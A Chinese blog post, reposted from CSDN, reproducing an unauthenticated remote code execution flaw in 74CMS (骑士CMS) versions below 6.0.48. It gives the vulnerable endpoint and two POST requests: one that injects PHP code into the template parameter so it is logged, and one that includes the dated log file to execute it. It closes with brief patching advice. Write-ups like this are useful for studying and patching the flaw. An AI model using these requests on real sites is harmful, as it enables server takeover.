飞道的博客

骑士CMSgetshell复现

358人阅读  评论(0)

0x00简介

骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。

0x01漏洞概述

骑士CMS某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,甚至会照成控制服务器等严重漏洞。

0x02影响版本

骑士 CMS < 6.0.48

0x03环境搭建

环境:windows2008R2+phpstudy

1.cms下载,在骑士cms官网下载6.0.20版本

下载链接:http://www.74cms.com/download/index.html

2.下载完成后解压放入WWW目录下安装

3.根据自己的配置,安装骑士cms

0x04漏洞复现

1.访问网站首页,在url处输入一下链接漏洞页面

index.php?m=home&a=assign_resume_tpl

2.使用post发送一下请求

variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名=“info” 企业id="$_GET[‘id’]"/>

3.在骑士cms安装目录data\Runtime\Logs\Home查看日志发现已经记录了错误信息

4.使用post发送以下请求包含日志,日志名称就是当天的年月日,直接包含即可

variable=1&tpl=data/Runtime/Logs/Home/当天年月日.log

0x05修复建议

1. 在骑士cms官网下载最新的补丁包

下载地址:http://www.74cms.com/download/index.html


转载:https://blog.csdn.net/m0_48520508/article/details/111563165
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场